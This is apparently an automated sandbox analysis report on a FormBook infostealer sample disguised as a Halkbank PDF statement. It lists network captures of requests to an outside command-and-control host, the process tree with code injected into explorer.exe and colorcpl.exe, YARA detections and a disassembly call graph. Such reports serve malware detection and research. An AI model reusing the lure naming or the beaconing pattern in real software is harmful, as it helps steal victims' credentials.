                                                    Data Ascii: !'v,Gw|mXxd,K7^lKHr8TCyd=`yI.Nd<R^5IIwhrpV/TK"p^vcWM@)N>!\#\N/_.+=rr<Ew?CsH>9%(4q$e>8^4IgtLOmNO/u8
                                                    Feb 20, 2023 11:24:52.751878977 CET170INData Raw: 20 08 d9 26 27 eb cb 67 5e 48 0a 24 2c 4e ce 43 cb 74 f7 91 e9 fa ba e1 21 b3 eb e9 8e e1 07 25 21 c4 25 e3 24 6c b4 2c 9b 8d a4 64 5c 8f 0e 12 3a 5d ea c6 7e 64 1b 36 84 fe b6 e1 eb 4e 00 84 e0 bf 50 37 90 ec a1 a5 ea dd 6f 6b 06 91 a4 c9 b7 24
                                                    Data Ascii: &'g^H$,NCt!%!%$l,d\:]~d6NP7ok$OAS9l"4/iVR)hR17'(Aa+8"$d3#2,u8%4 *FKsJV :ot8-eN7VWm)J('jYs>9;Ky7{F;/
                                                    Feb 20, 2023 11:24:52.751914024 CET170INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    8192.168.2.44970566.235.200.14680C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Feb 20, 2023 11:24:55.054128885 CET171OUTGET /ghii/?1LM=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XpEJ5LEY61yEIXoQ==&kTj=94JTJ5e-oG HTTP/1.1
                                                    Host: www.ladybillplanet.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Feb 20, 2023 11:24:55.528533936 CET171INHTTP/1.1 301 Moved Permanently
                                                    Date: Mon, 20 Feb 2023 10:24:55 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                    X-UA-Compatible: IE=edge
                                                    X-Redirect-By: WordPress
                                                    Location: http://ladybillplanet.com/ghii/?1LM=nNwsU5RDSztrDyxRHILLs79A8ojzBVjbvYOj2DqB/Q3esj8ZmeFlGSz1p8lC+bcuH8jypYjqHnnMah8No3XpEJ5LEY61yEIXoQ==&kTj=94JTJ5e-oG
                                                    host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                                    X-Endurance-Cache-Level: 2
                                                    X-nginx-cache: WordPress
                                                    CF-Cache-Status: MISS
                                                    Server: cloudflare
                                                    CF-RAY: 79c689081b4cbbdf-FRA
                                                    Data Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:11:22:54
                                                    Start date:20/02/2023
                                                    Path:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe
                                                    Imagebase:0x400000
                                                    File size:377609 bytes
                                                    MD5 hash:0D84005AF71574A568567967E666CDA5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low

                                                    General

                                                    Target ID:1
                                                    Start time:11:22:55
                                                    Start date:20/02/2023
                                                    Path:C:\Users\user\AppData\Local\Temp\vokkqsp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf
                                                    Imagebase:0x400000
                                                    File size:304640 bytes
                                                    MD5 hash:D2FAF24547268D9525AE7E78CD4DE87A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 13%, ReversingLabs
                                                    Reputation:low

                                                    General

                                                    Target ID:2
                                                    Start time:11:22:55
                                                    Start date:20/02/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff7c72c0000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Target ID:3
                                                    Start time:11:22:56
                                                    Start date:20/02/2023
                                                    Path:C:\Users\user\AppData\Local\Temp\vokkqsp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\AppData\Local\Temp\vokkqsp.exe
                                                    Imagebase:0x400000
                                                    File size:304640 bytes
                                                    MD5 hash:D2FAF24547268D9525AE7E78CD4DE87A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.344373835.00000000004F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.344373835.00000000004F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.344373835.00000000004F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.343757379.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.344609982.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.344609982.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.344609982.0000000000A00000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    Reputation:low

                                                    General

                                                    Target ID:4
                                                    Start time:11:23:01
                                                    Start date:20/02/2023
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0x7ff618f60000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Target ID:5
                                                    Start time:11:23:13
                                                    Start date:20/02/2023
                                                    Path:C:\Windows\SysWOW64\colorcpl.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                                    Imagebase:0x12b0000
                                                    File size:86528 bytes
                                                    MD5 hash:746F3B5E7652EA0766BA10414D317981
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.568126505.0000000001270000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.568126505.0000000001270000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.568126505.0000000001270000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.568031477.0000000001240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.568031477.0000000001240000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.568031477.0000000001240000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.567461782.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.567461782.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.567461782.0000000000DB0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    Reputation:high

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:15.9%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:16.4%
                                                      Total number of Nodes:1385
                                                      Total number of Limit Nodes:25
                                                      execution_graph 3224 403640 SetErrorMode GetVersionExW 3225 403692 GetVersionExW 3224->3225 3226 4036ca 3224->3226 3225->3226 3227 403723 3226->3227 3228 406a35 5 API calls 3226->3228 3314 4069c5 GetSystemDirectoryW 3227->3314 3228->3227 3230 403739 lstrlenA 3230->3227 3231 403749 3230->3231 3317 406a35 GetModuleHandleA 3231->3317 3234 406a35 5 API calls 3235 403757 3234->3235 3236 406a35 5 API calls 3235->3236 3237 403763 #17 OleInitialize SHGetFileInfoW 3236->3237 3323 406668 lstrcpynW 3237->3323 3240 4037b0 GetCommandLineW 3324 406668 lstrcpynW 3240->3324 3242 4037c2 3325 405f64 3242->3325 3245 4038f7 3246 40390b GetTempPathW 3245->3246 3329 40360f 3246->3329 3248 403923 3250 403927 GetWindowsDirectoryW lstrcatW 3248->3250 3251 40397d DeleteFileW 3248->3251 3249 405f64 CharNextW 3253 4037f9 3249->3253 3254 40360f 12 API calls 3250->3254 3339 4030d0 GetTickCount GetModuleFileNameW 3251->3339 3253->3245 3253->3249 3258 4038f9 3253->3258 3256 403943 3254->3256 3255 403990 3259 403b6c ExitProcess OleUninitialize 3255->3259 3261 403a45 3255->3261 3268 405f64 CharNextW 3255->3268 3256->3251 3257 403947 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3256->3257 3260 40360f 12 API calls 3257->3260 3425 406668 lstrcpynW 3258->3425 3263 403b91 3259->3263 3264 403b7c 3259->3264 3267 403975 3260->3267 3369 403d17 3261->3369 3265 403b99 GetCurrentProcess OpenProcessToken 3263->3265 3266 403c0f ExitProcess 3263->3266 3479 405cc8 3264->3479 3271 403bb0 LookupPrivilegeValueW AdjustTokenPrivileges 3265->3271 3272 403bdf 3265->3272 3267->3251 3267->3259 3283 4039b2 3268->3283 3271->3272 3276 406a35 5 API calls 3272->3276 3273 403a54 3273->3259 3279 403be6 3276->3279 3277 403a1b 3426 40603f 3277->3426 3278 403a5c 3442 405c33 3278->3442 3281 403bfb ExitWindowsEx 3279->3281 3285 403c08 3279->3285 3281->3266 3281->3285 3283->3277 3283->3278 3483 40140b 3285->3483 3288 403a72 lstrcatW 3289 403a7d lstrcatW lstrcmpiW 3288->3289 3289->3273 3290 403a9d 3289->3290 3292 403aa2 3290->3292 3293 403aa9 3290->3293 3445 405b99 CreateDirectoryW 3292->3445 3450 405c16 CreateDirectoryW 3293->3450 3294 403a3a 3441 406668 lstrcpynW 3294->3441 3299 403aae SetCurrentDirectoryW 3300 403ac0 3299->3300 3301 403acb 3299->3301 3453 406668 lstrcpynW 3300->3453 3454 406668 lstrcpynW 3301->3454 3306 403b19 CopyFileW 3310 403ad8 3306->3310 3307 403b63 3309 406428 36 API calls 3307->3309 3309->3273 3310->3307 3311 4066a5 17 API calls 3310->3311 3313 403b4d CloseHandle 3310->3313 3455 4066a5 3310->3455 3472 406428 MoveFileExW 3310->3472 3476 405c4b CreateProcessW 3310->3476 3311->3310 3313->3310 3315 4069e7 wsprintfW LoadLibraryExW 3314->3315 3315->3230 3318 406a51 3317->3318 3319 406a5b GetProcAddress 3317->3319 3320 4069c5 3 API calls 3318->3320 3321 403750 3319->3321 3322 406a57 3320->3322 3321->3234 3322->3319 3322->3321 3323->3240 3324->3242 3326 405f6a 3325->3326 3327 4037e8 CharNextW 3326->3327 3328 405f71 CharNextW 3326->3328 3327->3253 3328->3326 3486 4068ef 3329->3486 3331 403625 3331->3248 3332 40361b 3332->3331 3495 405f37 lstrlenW CharPrevW 3332->3495 3335 405c16 2 API calls 3336 403633 3335->3336 3498 406187 3336->3498 3502 406158 GetFileAttributesW CreateFileW 3339->3502 3341 403113 3368 403120 3341->3368 3503 406668 lstrcpynW 3341->3503 3343 403136 3504 405f83 lstrlenW 3343->3504 3347 403147 GetFileSize 3348 403241 3347->3348 3367 40315e 3347->3367 3509 40302e 3348->3509 3352 403286 GlobalAlloc 3355 40329d 3352->3355 3354 4032de 3356 40302e 32 API calls 3354->3356 3359 406187 2 API calls 3355->3359 3356->3368 3357 403267 3358 4035e2 ReadFile 3357->3358 3360 403272 3358->3360 3362 4032ae CreateFileW 3359->3362 3360->3352 3360->3368 3361 40302e 32 API calls 3361->3367 3363 4032e8 3362->3363 3362->3368 3524 4035f8 SetFilePointer 3363->3524 3365 4032f6 3525 403371 3365->3525 3367->3348 3367->3354 3367->3361 3367->3368 3540 4035e2 3367->3540 3368->3255 3370 406a35 5 API calls 3369->3370 3371 403d2b 3370->3371 3372 403d31 3371->3372 3373 403d43 3371->3373 3595 4065af wsprintfW 3372->3595 3596 406536 3373->3596 3377 403d92 lstrcatW 3378 403d41 3377->3378 3587 403fed 3378->3587 3379 406536 3 API calls 3379->3377 3382 40603f 18 API calls 3383 403dc4 3382->3383 3384 403e58 3383->3384 3386 406536 3 API calls 3383->3386 3385 40603f 18 API calls 3384->3385 3387 403e5e 3385->3387 3393 403df6 3386->3393 3388 403e6e LoadImageW 3387->3388 3389 4066a5 17 API calls 3387->3389 3390 403f14 3388->3390 3391 403e95 RegisterClassW 3388->3391 3389->3388 3395 40140b 2 API calls 3390->3395 3394 403ecb SystemParametersInfoW CreateWindowExW 3391->3394 3424 403f1e 3391->3424 3392 403e17 lstrlenW 3397 403e25 lstrcmpiW 3392->3397 3398 403e4b 3392->3398 3393->3384 3393->3392 3396 405f64 CharNextW 3393->3396 3394->3390 3399 403f1a 3395->3399 3400 403e14 3396->3400 3397->3398 3401 403e35 GetFileAttributesW 3397->3401 3402 405f37 3 API calls 3398->3402 3404 403fed 18 API calls 3399->3404 3399->3424 3400->3392 3403 403e41 3401->3403 3405 403e51 3402->3405 3403->3398 3406 405f83 2 API calls 3403->3406 3407 403f2b 3404->3407 3601 406668 lstrcpynW 3405->3601 3406->3398 3409 403f37 ShowWindow 3407->3409 3410 403fba 3407->3410 3411 4069c5 3 API calls 3409->3411 3602 40579d OleInitialize 3410->3602 3413 403f4f 3411->3413 3415 403f5d GetClassInfoW 3413->3415 3418 4069c5 3 API calls 3413->3418 3414 403fc0 3416 403fc4 3414->3416 3417 403fdc 3414->3417 3420 403f71 GetClassInfoW RegisterClassW 3415->3420 3421 403f87 DialogBoxParamW 3415->3421 3422 40140b 2 API calls 3416->3422 3416->3424 3419 40140b 2 API calls 3417->3419 3418->3415 3419->3424 3420->3421 3423 40140b 2 API calls 3421->3423 3422->3424 3423->3424 3424->3273 3425->3246 3624 406668 lstrcpynW 3426->3624 3428 406050 3625 405fe2 CharNextW CharNextW 3428->3625 3431 403a27 3431->3259 3440 406668 lstrcpynW 3431->3440 3432 4068ef 5 API calls 3438 406066 3432->3438 3433 406097 lstrlenW 3434 4060a2 3433->3434 3433->3438 3435 405f37 3 API calls 3434->3435 3437 4060a7 GetFileAttributesW 3435->3437 3437->3431 3438->3431 3438->3433 3439 405f83 2 API calls 3438->3439 3631 40699e FindFirstFileW 3438->3631 3439->3433 3440->3294 3441->3261 3443 406a35 5 API calls 3442->3443 3444 403a61 lstrcatW 3443->3444 3444->3288 3444->3289 3446 403aa7 3445->3446 3447 405bea GetLastError 3445->3447 3446->3299 3447->3446 3448 405bf9 SetFileSecurityW 3447->3448 3448->3446 3449 405c0f GetLastError 3448->3449 3449->3446 3451 405c2a GetLastError 3450->3451 3452 405c26 3450->3452 3451->3452 3452->3299 3453->3301 3454->3310 3459 4066b2 3455->3459 3456 4068d5 3457 403b0d DeleteFileW 3456->3457 3636 406668 lstrcpynW 3456->3636 3457->3306 3457->3310 3459->3456 3460 4068a3 lstrlenW 3459->3460 3461 4067ba GetSystemDirectoryW 3459->3461 3464 406536 3 API calls 3459->3464 3465 4066a5 10 API calls 3459->3465 3466 4067cd GetWindowsDirectoryW 3459->3466 3467 406844 lstrcatW 3459->3467 3468 4066a5 10 API calls 3459->3468 3469 4068ef 5 API calls 3459->3469 3470 4067fc SHGetSpecialFolderLocation 3459->3470 3634 4065af wsprintfW 3459->3634 3635 406668 lstrcpynW 3459->3635 3460->3459 3461->3459 3464->3459 3465->3460 3466->3459 3467->3459 3468->3459 3469->3459 3470->3459 3471 406814 SHGetPathFromIDListW CoTaskMemFree 3470->3471 3471->3459 3473 406449 3472->3473 3474 40643c 3472->3474 3473->3310 3637 4062ae 3474->3637 3477 405c8a 3476->3477 3478 405c7e CloseHandle 3476->3478 3477->3310 3478->3477 3482 405cdd 3479->3482 3480 403b89 ExitProcess 3481 405cf1 MessageBoxIndirectW 3481->3480 3482->3480 3482->3481 3484 401389 2 API calls 3483->3484 3485 401420 3484->3485 3485->3266 3487 4068fc 3486->3487 3489 406972 3487->3489 3490 406965 CharNextW 3487->3490 3492 405f64 CharNextW 3487->3492 3493 406951 CharNextW 3487->3493 3494 406960 CharNextW 3487->3494 3488 406977 CharPrevW 3488->3489 3489->3488 3491 406998 3489->3491 3490->3487 3490->3489 3491->3332 3492->3487 3493->3487 3494->3490 3496 405f53 lstrcatW 3495->3496 3497 40362d 3495->3497 3496->3497 3497->3335 3499 406194 GetTickCount GetTempFileNameW 3498->3499 3500 40363e 3499->3500 3501 4061ca 3499->3501 3500->3248 3501->3499 3501->3500 3502->3341 3503->3343 3505 405f91 3504->3505 3506 40313c 3505->3506 3507 405f97 CharPrevW 3505->3507 3508 406668 lstrcpynW 3506->3508 3507->3505 3507->3506 3508->3347 3510 403057 3509->3510 3511 40303f 3509->3511 3513 403067 GetTickCount 3510->3513 3514 40305f 3510->3514 3512 403048 DestroyWindow 3511->3512 3517 40304f 3511->3517 3512->3517 3516 403075 3513->3516 3513->3517 3544 406a71 3514->3544 3518 4030aa CreateDialogParamW ShowWindow 3516->3518 3519 40307d 3516->3519 3517->3352 3517->3368 3543 4035f8 SetFilePointer 3517->3543 3518->3517 3519->3517 3548 403012 3519->3548 3521 40308b wsprintfW 3551 4056ca 3521->3551 3524->3365 3526 403380 SetFilePointer 3525->3526 3527 40339c 3525->3527 3526->3527 3562 403479 GetTickCount 3527->3562 3532 403479 42 API calls 3533 4033d3 3532->3533 3534 40343f ReadFile 3533->3534 3538 4033e2 3533->3538 3539 403439 3533->3539 3534->3539 3536 4061db ReadFile 3536->3538 3538->3536 3538->3539 3577 40620a WriteFile 3538->3577 3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3751 401423 3738->3751 3739 405f64 CharNextW 3739->3747 3748 40165b 3742->3748 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3748 3747->3736 3747->3739 3747->3744 3747->3745 3749 401617 GetFileAttributesW 3747->3749 3750 405b99 4 API calls 3747->3750 3749->3747 3750->3747 3752 4056ca 24 API calls 3751->3752 3753 401431 3752->3753 3754 406668 lstrcpynW 3753->3754 3754->3746 3935 401c43 3957 402d84 3935->3957 3937 401c4a 3938 402d84 17 API calls 3937->3938 3939 401c57 3938->3939 3940 402da6 17 API calls 3939->3940 3941 401c6c 3939->3941 3940->3941 3942 401c7c 3941->3942 3943 402da6 17 API calls 3941->3943 3944 401cd3 3942->3944 3945 401c87 3942->3945 3943->3942 3947 402da6 17 API calls 3944->3947 3946 402d84 17 API calls 3945->3946 3949 401c8c 3946->3949 3948 401cd8 3947->3948 3950 402da6 17 API calls 3948->3950 3951 402d84 17 API calls 3949->3951 3952 401ce1 FindWindowExW 3950->3952 3953 401c98 3951->3953 3956 401d03 3952->3956 3954 401cc3 SendMessageW 3953->3954 3955 401ca5 SendMessageTimeoutW 3953->3955 3954->3956 3955->3956 3958 4066a5 17 API calls 3957->3958 3959 402d99 3958->3959 3959->3937 3967 4028c4 3968 4028ca 3967->3968 3969 4028d2 FindClose 3968->3969 3970 402c2a 3968->3970 3969->3970 3776 4040c5 3777 4040dd 3776->3777 3778 40423e 3776->3778 3777->3778 3779 4040e9 3777->3779 3780 40424f GetDlgItem GetDlgItem 3778->3780 3785 40428f 3778->3785 3782 4040f4 SetWindowPos 3779->3782 3783 404107 3779->3783 3852 4045c4 3780->3852 3781 4042e9 3786 404610 SendMessageW 3781->3786 3794 404239 3781->3794 3782->3783 3787 404110 ShowWindow 3783->3787 3788 404152 3783->3788 3785->3781 3793 401389 2 API calls 3785->3793 3817 4042fb 3786->3817 3795 404130 GetWindowLongW 3787->3795 3796 40422b 3787->3796 3790 404171 3788->3790 3791 40415a DestroyWindow 3788->3791 3789 404279 KiUserCallbackDispatcher 3792 40140b 2 API calls 3789->3792 3798 404176 SetWindowLongW 3790->3798 3799 404187 3790->3799 3797 40456e 3791->3797 3792->3785 3800 4042c1 3793->3800 3795->3796 3802 404149 ShowWindow 3795->3802 3858 40462b 3796->3858 3797->3794 3809 40457e ShowWindow 3797->3809 3798->3794 3799->3796 3803 404193 GetDlgItem 3799->3803 3800->3781 3804 4042c5 SendMessageW 3800->3804 3802->3788 3807 4041c1 3803->3807 3808 4041a4 SendMessageW IsWindowEnabled 3803->3808 3804->3794 3805 40140b 2 API calls 3805->3817 3806 40454f DestroyWindow EndDialog 3806->3797 3811 4041ce 3807->3811 3814 404215 SendMessageW 3807->3814 3815 4041e1 3807->3815 3823 4041c6 3807->3823 3808->3794 3808->3807 3809->3794 3810 4066a5 17 API calls 3810->3817 3811->3814 3811->3823 3813 4045c4 18 API calls 3813->3817 3814->3796 3818 4041e9 3815->3818 3819 4041fe 3815->3819 3816 4041fc 3816->3796 3817->3805 3817->3806 3817->3810 3817->3813 3824 4045c4 18 API calls 3817->3824 3821 40140b 2 API calls 3818->3821 3820 40140b 